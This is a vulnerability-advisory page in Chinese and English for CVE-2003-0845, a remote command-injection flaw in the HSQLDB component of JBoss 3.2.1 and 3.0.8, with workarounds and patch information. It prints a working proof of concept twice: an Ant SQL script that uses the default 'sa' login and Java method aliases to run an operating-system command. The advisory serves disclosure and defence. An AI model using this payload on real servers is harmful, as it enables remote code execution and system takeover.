CVE-2003-0845
CVSS7.5
发布时间 :2003-11-17 00:00:00
修订时间 :2016-10-17 22:37:56
NMCOES    

[原文]Unknown vulnerability in the HSQLDB component in JBoss 3.2.1 and 3.0.8 on Java 1.4.x platforms, when running in the default configuration, allows remote attackers to conduct unauthorized activities and possibly execute arbitrary code via certain SQL statements to (1) TCP port 1701 in JBoss 3.2.1, and (2) port 1476 in JBoss 3.0.8.


[CNNVD]JBoss HSQLDB远程命令注入漏洞(CNNVD-200311-071)

        
        JBoss J2EE是Java应用服务程序。
        JBoss可以通过HSQLDB组件远程注入任意命令,远程攻击者可以利用这个漏洞控制整个系统。
        命令注入漏洞存在与JBoss服务器组件HSQLDB(管理JMS连接的SQL数据库)中,在sun.*类中存在程序设计错误和org.apache.*类中存在逻辑错误,远程攻击者可以通过构建恶意SQL命令提交给服务程序,更改原系统SQL逻辑,以Java进程权限在系统上执行任意命令。
        另外JBoss服务器还存在拒绝服务、日志可操作、信息泄露等多个漏洞。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:11300Unknown vulnerability in the HSQLDB component in JBoss 3.2.1 and 3.0.8 on Java 1.4.x platforms, when running in the default configuration, a...
oval:org.mitre.oval:def:22393ELSA-2007:1048: openoffice.org, hsqldb security update (Moderate)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0845
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0845
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-071
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=106546044416498&w=2
(UNKNOWN)  BUGTRAQ  20031005 JBoss 3.2.1: Remote Command Injection
http://marc.info/?l=bugtraq&m=106547728803252&w=2
(UNKNOWN)  BUGTRAQ  20031006 Update JBoss 308 & 321: Remote Command Injection
http://sourceforge.net/docman/display_doc.php?docid=19314&group_id=22866
(UNKNOWN)  CONFIRM  http://sourceforge.net/docman/display_doc.php?docid=19314&group_id=22866
http://www.redhat.com/support/errata/RHSA-2007-1048.html
(UNKNOWN)  REDHAT  RHSA-2007:1048
http://www.securityfocus.com/bid/8773
(VENDOR_ADVISORY)  BID  8773

- 漏洞信息

JBoss HSQLDB远程命令注入漏洞
高危 未知
2003-11-17 00:00:00 2005-10-20 00:00:00
远程  
        
        JBoss J2EE是Java应用服务程序。
        JBoss可以通过HSQLDB组件远程注入任意命令,远程攻击者可以利用这个漏洞控制整个系统。
        命令注入漏洞存在与JBoss服务器组件HSQLDB(管理JMS连接的SQL数据库)中,在sun.*类中存在程序设计错误和org.apache.*类中存在逻辑错误,远程攻击者可以通过构建恶意SQL命令提交给服务程序,更改原系统SQL逻辑,以Java进程权限在系统上执行任意命令。
        另外JBoss服务器还存在拒绝服务、日志可操作、信息泄露等多个漏洞。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 更改配置文件中如下行:
        
        
        jdbc:hsqldb:hsql://localhost:1701
        

        为:
        
        然后, 删除或注释如下段:
        
                name="jboss:service=Hypersonic">
        1701
        true
        default
        false
        true
        

        厂商补丁:
        JBoss Group
        -----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.jboss.org/

- 漏洞信息 (23221)

JBoss 3.0.8/3.2.1 HSQLDB Remote Command Injection Vulnerability (EDBID:23221)
multiple remote
2003-10-06 Verified
0 Marc Schoenefeld
N/A [点击下载]
source: http://www.securityfocus.com/bid/8773/info

A remote command-injection vulnerability has been reported in JBoss. The issue is reportedly exposed via the HSQLDB component, which is a SQL database server that manages JMS connections. Because of a number of flaws, an attacker can pass commands to the HSQLDB component via the port it listens on. Note that the port may vary between versions; by default it is 1701/TCP for JBoss 3.2.1 and 1476/TCP for 3.0.8.

Attackers can exploit this issue to mount a number of attacks, including execution of database commands, denial-of-service attacks, log manipulation, information disclosure, and execution of operating system commands on some supported platforms.

This issue is reported to exist with JBoss 3.2.1/3.0.8 on any Java 1.4.x-enabled platforms. Other versions may also be affected. 

<target name="cmdinject">
<sql
classpath="hsqldb.jar"
driver="org.hsqldb.jdbcDriver"
url="jdbc:hsqldb:hsql://${host}:${port}"
userid="sa"
password=""
print = "true"
>
CREATE ALIAS COMPDEBUG FOR
"org.apache.xml.utils.synthetic.JavaUtils.setDebug"
CREATE ALIAS SETPROP FOR "java.lang.System.setProperty";
CREATE ALIAS COMPILE FOR
"org.apache.xml.utils.synthetic.JavaUtils.JDKcompile";

CALL COMPDEBUG(true);
CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe');
CALL COMPILE('/c REGEDIT.EXE','');
</sql>
</target> 		

- 漏洞信息

10094
JBoss HSQLDB Component TCP Port SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-10-05 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

JBoss HSQLDB Remote Command Injection Vulnerability
Unknown 8773
Yes No
2003-10-06 12:00:00 2007-12-18 08:05:00
Discovery is credited to Marc Schoenefeld.

- 受影响的程序版本

RedHat Enterprise Linux Optional Productivity Application 5 server
Red Hat Enterprise Linux Desktop 5 client
jBpm.org jBpm 2.0
+ JBoss Group JBoss 3.2.1
JBoss Group JBoss 3.2.1
JBoss Group JBoss 3.0.8
HSQLDB hsqldb 1.8 4

- 漏洞讨论

A remote command-injection vulnerability has been reported in JBoss. The issue is reportedly exposed via the HSQLDB component, which is a SQL database server that manages JMS connections. Because of a number of flaws, an attacker can pass commands to the HSQLDB component via the port it listens on. Note that the port may vary between versions; by default it is 1701/TCP for JBoss 3.2.1 and 1476/TCP for 3.0.8.

Attackers can exploit this issue to mount a number of attacks, including execution of database commands, denial-of-service attacks, log manipulation, information disclosure, and execution of operating system commands on some supported platforms.

This issue is reported to exist with JBoss 3.2.1/3.0.8 on any Java 1.4.x-enabled platforms. Other versions may also be affected.

- 漏洞利用

The researchers who discovered this vulnerability have developed a working exploit that is not publicly available or known to be circulating in the wild.

The following proof of concept is available:
&lt;target name="cmdinject"&gt;
&lt;sql
classpath="hsqldb.jar"
driver="org.hsqldb.jdbcDriver"
url="jdbc:hsqldb:hsql://${host}:${port}"
userid="sa"
password=""
print = "true"
&gt;
CREATE ALIAS COMPDEBUG FOR
"org.apache.xml.utils.synthetic.JavaUtils.setDebug"
CREATE ALIAS SETPROP FOR "java.lang.System.setProperty";
CREATE ALIAS COMPILE FOR
"org.apache.xml.utils.synthetic.JavaUtils.JDKcompile";

CALL COMPDEBUG(true);
CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe');
CALL COMPILE('/c REGEDIT.EXE','');
&lt;/sql&gt;
&lt;/target&gt;

- 解决方案

The vendor has addressed this issue in JBoss 3.2.2 and in the CVS tree of the JBoss 3.0.x tree. The committed CVS change can be found in the appropriate web reference. The vendor has stated that JBoss 3.0.9 is pending release.


JBoss Group JBoss 3.2.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站